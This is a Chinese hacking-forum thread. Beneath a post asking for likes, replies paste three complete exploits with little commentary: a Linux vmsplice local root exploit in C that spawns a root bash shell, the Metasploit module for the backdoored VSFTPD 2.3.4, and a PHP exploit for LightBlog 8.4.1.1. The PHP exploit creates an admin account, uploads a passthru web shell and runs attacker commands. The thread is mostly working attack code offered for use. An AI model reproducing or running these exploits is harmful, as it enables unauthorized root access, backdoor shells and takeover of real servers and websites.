最近看过此主题的会员

返回列表 发帖

快快快来赞我。有福利哦

快赞我,我给大家发福利
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:人称大B哥发表,本帖发表者人称大B哥符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者人称大B哥和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

菊花么。。。

TOP

Linux vmsplice Local Root Exploit
Linux vmsplice Local Root Exploit
/*
* hackerial.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By Hackeri-AL UAHCrew
*
* Linux 2.6.18 - 2011
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include


#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)


struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};


void exit_code();
char exit_stack[1024 * 1024];


void die(char *msg, int err)
{
printf(err ? "[-] %s: %s
" : "[-] %s
", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}


#if defined (__i386__)


#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif


#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246


static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}


static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}


#elif defined (__x86_64__)


#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif


#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246


static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}


static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}


#else
#error "unsupported arch"
#endif


#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)


#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif


static uint uid, gid;


void kernel_code()
{
int i;
uint *p = get_current();


for (i = 0; i < 1024-13; i++) { if (p[0] == uid &amp;&amp; p[1] == uid &amp;&amp; p[2] == uid &amp;&amp; p[3] == uid &amp;&amp; p[4] == gid &amp;&amp; p[5] == gid &amp;&amp; p[6] == gid &amp;&amp; p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() { if (getuid() != 0) die("wtf", 0); printf("[+] root
"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); } int main(int argc, char *argv[]) { int pi[2]; size_t map_size; char * map_addr; struct iovec iov; struct page * pages[5]; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); printf("-----------------------------------
"); printf(" Linux vmsplice Local Root Exploit
"); printf(" By Hackeri-AL
"); printf("-----------------------------------
"); if (!uid || !gid) die("!@#$", 0); /*****/ pages[0] = *(void **) &amp;(int[2]){0,PAGE_SIZE}; pages[1] = pages[0] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size); printf("[+] page: 0x%lx
", pages[0]); printf("[+] page: 0x%lx
", pages[1]); pages[0]->flags = 1 << PG_compound; pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;


/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;


map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);


memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx
", pages[2]);
printf("[+] page: 0x%lx
", pages[3]);


pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;


/*****/
pages[4] = *(void **) &amp;(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx
", pages[4]);


/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);


memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx
", map_addr, map_addr + map_size);


/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);


/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);


iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;


signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &amp;iov, 1, 0);
die("vmsplice", errno);
return 0;
}




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

VSFTPD v2.3.4 Backdoor 命令执行漏洞
################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################



require msf/core

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info
Name => VSFTPD v2.3.4 Backdoor Command Execution
Descript_ion => %q{
This module exploits a malicious backdoor that was added to the VSFTPD download
archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
June 30th 2011 and July 1st 2011 according to the most recent information
available. This backdoor was removed on July 3rd 2011.
}
Author => [ hdm mc ]
License => MSF_LICENSE
Version => $Revision: 13099 $
References =>
[
[ URL http://pastebin.com/AetT9sS5]
[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
]
Privileged => true
Platform => [ unix ]
Arch => ARCH_CMD
Payload =>
{
Space => 2000
BadChars =>
DisableNops => true
Compat =>
{
PayloadType => cmd_interact
ConnectionType => find
}
}
Targets =>
[
[ Automatic { } ]
]
DisclosureDate => Jul 3 2011
DefaultTarget => 0))

register_options([ Opt::RPORT(21) ] self.class)
end

def exploit

nsock = self.connect(false {RPORT => 6200}) rescue nil
if nsock
print_status(The port used by the backdoor bind listener is already open)
handle_backdoor(nsock)
return
end

# Connect to the FTP service port first
connect

banner = sock.get_once(-1 30).to_s
print_status(Banner: #{banner.strip})

sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
)
resp = sock.get_once(-1 30).to_s
print_status(USER: #{resp.strip})

if resp =~ /^530 /
print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
disconnect
return
end

if resp !~ /^331 /
print_error(This server did not respond as expected: #{resp.strip})
disconnect
return
end

sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}
)

# Do not bother reading the response from password just try the backdoor
nsock = self.connect(false {RPORT => 6200}) rescue nil
if nsock
print_good(Backdoor service has been spawned handling...)
handle_backdoor(nsock)
return
end

disconnect

end

def handle_backdoor(s)

s.put(id
)

r = s.get_once(-1 5).to_s
if r !~ /uid=/
print_error(The service on port 6200 does not appear to be a shell)
disconnect(s)
return
end

print_good(UID: #{r.strip})

s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
handler(s)
end

end复制代码


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

LightBlog 8.4.1.1 远程代码执行漏洞
安装PHP.EXE  CMD下执行
#!/usr/bin/php -q -d short_open_tag=on以下为PHP Exploit 保存为*.PHP
<?echo "LightBlog 8.4.1.1 Remote Code Execution Exploitby BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>Thanks to rgod for the php code and Marty for the Love";if ($argc<3) {echo "Usage: php ".$argv[0]." Host Path Host:          target server (ip/hostname)Path:          path of lightblogExample:php ".$argv[0]." localhost /lightblog/ dir";die;}error_reporting(0);ini_set("max_execution_time",0);ini_set("default_socket_timeout",5);function quick_dump($string){  $result='';$exa='';$cont=0;  for ($i=0; $i<=strlen($string)-1; $i++)  {   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))   {$result.="  .";}   else   {$result.="  ".$string[$i];}   if (strlen(dechex(ord($string[$i])))==2)   {$exa.=" ".dechex(ord($string[$i]));}   else   {$exa.=" 0".dechex(ord($string[$i]));}   $cont++;if ($cont==15) {$cont=0; $result.="
"; $exa.="
";}  }return $exa."
".$result;}$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})';function sendpacketii($packet){  global $proxy, $host, $port, $html, $proxy_regex;  if ($proxy=='') {    $ock=fsockopen(gethostbyname($host),$port);    if (!$ock) {      echo 'No response from '.$host.':'.$port; die;    }  }  else {        $c = preg_match($proxy_regex,$proxy);    if (!$c) {      echo 'Not a valid proxy...';die;    }    $parts=explode(':',$proxy);    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...
";    $ock=fsockopen($parts[0],$parts[1]);    if (!$ock) {      echo 'No response from proxy...';die;        }  }  fputs($ock,$packet);  if ($proxy=='') {    $html='';    while (!feof($ock)) {      $html.=fgets($ock);    }  }  else {    $html='';    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {      $html.=fread($ock,1);    }  }  fclose($ock);}$host=$argv[1];$path=$argv[2];$cmd="";for ($i=3; $i<=$argc-1; $i++){$cmd.=" ".$argv[$i];}$cmd=urlencode($cmd);$port=80;$proxy="";if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}echo "Step 0 - If Shell already exists, run it..
";$packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);if (strstr($html,"666999")){  echo "Exploit succeeded...
";  $temp=explode("666999",$html);  die("
".$temp[1]."
");}echo 'Step 1 - Creating New User (Name: Piggy_Marty Pwd: DAFORNO_IMPERAT)..';//Retrieving the "confirmation" code$packet ="GET ".$p."register.php HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);preg_match('#<b>([a-zA-Z0-9]+?)</b><input name="rand" type="hidden" value="([a-zA-Z0-9]+?)" />#is', $html, $fuori);$conf_code = $fuori[1];$rand_code = $fuori[2];//Doing the registration$data="rand=$rand_code&amp;val=$conf_code&amp;username_post=Piggy_Marty&amp;pwd1_post=DAFORNO_IMPERAT&amp;pwd2_post=DAFORNO_IMPERAT&amp;name_post=Piggy_Marty&amp;email_post=hawkgotyou@gmail.com";$packet="POST ".$p."register.php HTTP/1.0
";$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*
";$packet.="Accept-Language: it
";$packet.="Content-Type: application/x-www-form-urlencoded
";$packet.="Accept-Encoding: gzip, deflate
";$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
";$packet.="Host: localhost
";$packet.="Content-Length: ".strlen($data)."
";$packet.="Connection: Close
";$packet.="Cache-Control: no-cache

";$packet.=$data;sendpacketii($packet);sleep(1);echo 'Step 2 - Promoting Piggy_Marty to admin level..';$data="type_post=admin&amp;username_post=Piggy_Marty";$packet="POST ".$p."cp_memberedit.php HTTP/1.0
";$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*
";$packet.="Accept-Language: it
";$packet.="Content-Type: application/x-www-form-urlencoded
";$packet.="Accept-Encoding: gzip, deflate
";$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
";$packet.="Host: localhost
";$packet.="Content-Length: ".strlen($data)."
";$packet.="Connection: Close
";$packet.="Cache-Control: no-cache

";$packet.=$data;sendpacketii($packet);sleep(1);echo 'Step 3 - Uploading Shell Creator..';$data="-----------------------------7d529a1d23092a
";$data.="Content-Disposition: form-data; name="image"; filename="piggy_marty_creator.php"
";$data.="Content-Type:

";$data.="<?php$fp=fopen('piggy_marty.php','w');fputs($fp,'<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_GET[cmd]=stripslashes($_GET[cmd]);}echo 666999;passthru($_GET[cmd]);echo 666999;?>');fclose($fp);chmod('piggy_marty.php',777);?>
";$data.='-----------------------------7d529a1d23092aContent-Disposition: form-data; name="title"Not so good if you see this..-----------------------------7d529a1d23092aContent-Disposition: form-data; name="post"An Exploit has attacked your site.. contact hawkgotyou@gmail.com for more details-----------------------------7d529a1d23092a--';$packet="POST ".$p."main.php HTTP/1.0
";$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*
";$packet.="Referer: http://".$host.$path."/
";$packet.="Cookie: Lightblog_username=Piggy_Marty&amp;Lightblog_password=DAFORNO_IMPERAT
";$packet.="Accept-Language: it
";$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a
";$packet.="Accept-Encoding: gzip, deflate
";$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
";$packet.="Host: ".$host."
";$packet.="Content-Length: ".strlen($data)."
";$packet.="Connection: Close
";$packet.="Cache-Control: no-cache

";$packet.=$data;sendpacketii($packet);sleep(1);echo 'Step 4 - Executing Creator..';$packet ="GET ".$p."images/piggy_marty_creator.php HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);sleep(1);echo "Step 5 - Execute Commands..
";$packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0
";$packet.="Host: ".$host."
";$packet.="Connection: Close

";sendpacketii($packet);if (strstr($html,"666999")){  echo "Exploit succeeded...
";  $temp=explode("666999",$html);  die("
".$temp[1]."
");}# Coded With BH Fast Generator v0.1?>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表